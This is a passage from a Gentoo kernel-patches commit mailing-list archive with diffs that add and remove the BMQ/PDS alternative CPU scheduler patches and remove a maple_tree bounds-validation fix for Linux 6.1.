+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+ 
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 

diff --git a/5021_BMQ-and-PDS-gentoo-defaults.patch b/5021_BMQ-and-PDS-gentoo-defaults.patch
new file mode 100644
index 00000000..6dc48eec
--- /dev/null
+++ b/5021_BMQ-and-PDS-gentoo-defaults.patch
@@ -0,0 +1,13 @@
+--- a/init/Kconfig	2023-02-13 08:16:09.534315265 -0500
++++ b/init/Kconfig	2023-02-13 08:17:24.130237204 -0500
+@@ -867,8 +867,9 @@ config UCLAMP_BUCKETS_COUNT
+ 	  If in doubt, use the default value.
+ 
+ menuconfig SCHED_ALT
++	depends on X86_64
+ 	bool "Alternative CPU Schedulers"
+-	default y
++	default n
+ 	help
+ 	  This feature enable alternative CPU scheduler"
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:52 UTC (permalink / raw
  To: gentoo-commits

commit:     bdd82fbe515cff9a65127ab3ad72a41da18f870b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:52:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:52:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bdd82fbe

Remove unneeded patch

Removed:
1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ----------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 2a0b727d..e9f79f14 100644
--- a/0000_README
+++ b/0000_README
@@ -99,10 +99,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
-From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
deleted file mode 100644
index 53075739..00000000
--- a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
-From: Liam Howlett <liam.howlett@oracle.com>
-Date: Wed, 11 Jan 2023 20:02:07 +0000
-Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
-
-mas_empty_area_rev() was not correctly validating the start of a gap
-against the lower limit.  This could lead to the range starting lower than
-the requested minimum.
-
-Fix the issue by better validating a gap once one is found.
-
-This commit also adds tests to the maple tree test suite for this issue
-and tests the mas_empty_area() function for similar bound checking.
-
-Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
-Fixes: 54a611b60590 ("Maple Tree: add new data structure")
-Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
-Reported-by: <amanieu@gmail.com>
-  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
-Tested-by: Holger Hoffsttte <holger@applied-asynchrony.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
----
- lib/maple_tree.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-(limited to 'lib/maple_tree.c')
-
-diff --git a/lib/maple_tree.c b/lib/maple_tree.c
-index 26e2045d3cda9..b990ccea454ec 100644
---- a/lib/maple_tree.c
-+++ b/lib/maple_tree.c
-@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	unsigned long *pivots, *gaps;
- 	void __rcu **slots;
- 	unsigned long gap = 0;
--	unsigned long max, min, index;
-+	unsigned long max, min;
- 	unsigned char offset;
- 
- 	if (unlikely(mas_is_err(mas)))
-@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, --offset);
- 
- 	max = mas_safe_pivot(mas, pivots, offset, type);
--	index = mas->index;
--	while (index <= max) {
-+	while (mas->index <= max) {
- 		gap = 0;
- 		if (gaps)
- 			gap = gaps[offset];
-@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, offset);
- 	}
- 
--	if (unlikely(index > max)) {
--		mas_set_err(mas, -EBUSY);
--		return false;
--	}
-+	if (unlikely((mas->index > max) || (size - 1 > max - mas->index)))
-+		goto no_space;
- 
- 	if (unlikely(ma_is_leaf(type))) {
- 		mas->offset = offset;
-@@ -4961,9 +4958,11 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	return false;
- 
- ascend:
--	if (mte_is_root(mas->node))
--		mas_set_err(mas, -EBUSY);
-+	if (!mte_is_root(mas->node))
-+		return false;
- 
-+no_space:
-+	mas_set_err(mas, -EBUSY);
- 	return false;
- }
- 
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-09 12:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-09 12:49 UTC (permalink / raw
  To: gentoo-commits

commit:     5bcc961157e1af1569655b8051f2772e0bf2858b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  9 12:48:49 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  9 12:48:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5bcc9611

Remove BMQ for now, will fix in later release

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 -
 5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch | 10154 --------------------------
 2 files changed, 10158 deletions(-)

diff --git a/0000_README b/0000_README
index 62ade3e6..2a0b727d 100644
--- a/0000_README
+++ b/0000_README
@@ -138,7 +138,3 @@ Desc:   Add Gentoo Linux support config settings and defaults.
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
-From:   https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
deleted file mode 100644
index 7c2a77d3..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4.patch
+++ /dev/null
@@ -1,10154 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
- 
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
- 
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
- 
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield calls
-+to sched_yield will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
-+and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
-+simple, while efficiency and scalable for interactive tasks, such as desktop,
-+movie playback and gaming etc.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
-+each CPU is responsible for scheduling the tasks that are putting into it's
-+run queue.
-+
-+The run queue is a set of priority queues. Note that these queues are fifo
-+queue for non-rt tasks or priority queue for rt tasks in data structure. See
-+BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
-+that most applications are non-rt tasks. No matter the queue is fifo or
-+priority, In each queue is an ordered list of runnable tasks awaiting execution
-+and the data structures are the same. When it is time for a new task to run,
-+the scheduler simply looks the lowest numbered queueue that contains a task,
-+and runs the first task from the head of that queue. And per CPU idle task is
-+also in the run queue, so the scheduler can always find a task to run on from
-+its run queue.
-+
-+Each task will assigned the same timeslice(default 4ms) when it is picked to
-+start running. Task will be reinserted at the end of the appropriate priority
-+queue when it uses its whole timeslice. When the scheduler selects a new task
-+from the priority queue it sets the CPU's preemption timer for the remainder of
-+the previous timeslice. When that timer fires the scheduler will stop execution
-+on that task, select another task and start over again.
-+
-+If a task blocks waiting for a shared resource then it's taken out of its
-+priority queue and is placed in a wait queue for the shared resource. When it
-+is unblocked it will be reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
-+mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
-+NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
-+policy.
-+
-+DEADLINE
-+	It is squashed as priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in BMQ run queue designed. The
-+complexity of insert operation is O(n). BMQ is not designed for system runs
-+with major rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
-+NORMAL policy tasks, but they just don't boost. To control the priority of
-+NORMAL/BATCH/IDLE tasks, simply use nice level.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
-+task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priority from 0-99. For non-rt tasks, there are three different
-+factors used to determine the effective priority of a task. The effective
-+priority being what is used to determine which queue it will be in.
-+
-+The first factor is simply the task’s static priority. Which is assigned from
-+task's nice level, within [-20, 19] in userland's point of view and [0, 39]
-+internally.
-+
-+The second factor is the priority boost. This is a value bounded between
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
-+modified by the following cases:
-+
-+*When a thread has used up its entire timeslice, always deboost its boost by
-+increasing by one.
-+*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
-+and its switch-in time(time after last switch and run) below the thredhold
-+based on its priority boost, will boost its boost by decreasing by one buti is
-+capped at 0 (won’t go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
- 
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
- 
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
- 
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
- 
-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
- 
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertian rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * the fact that any of them has higher prio than RT and
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- static inline bool dl_time_before(u64 a, u64 b)
- {
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
- 
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
- 
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
- 
- #endif	/* !CONFIG_SMP */
- 
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
- 
- 	  If in doubt, use the default value.
- 
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enable alternative CPU scheduler"
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
- 
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
- 
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
- 
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
- 
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
- 
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
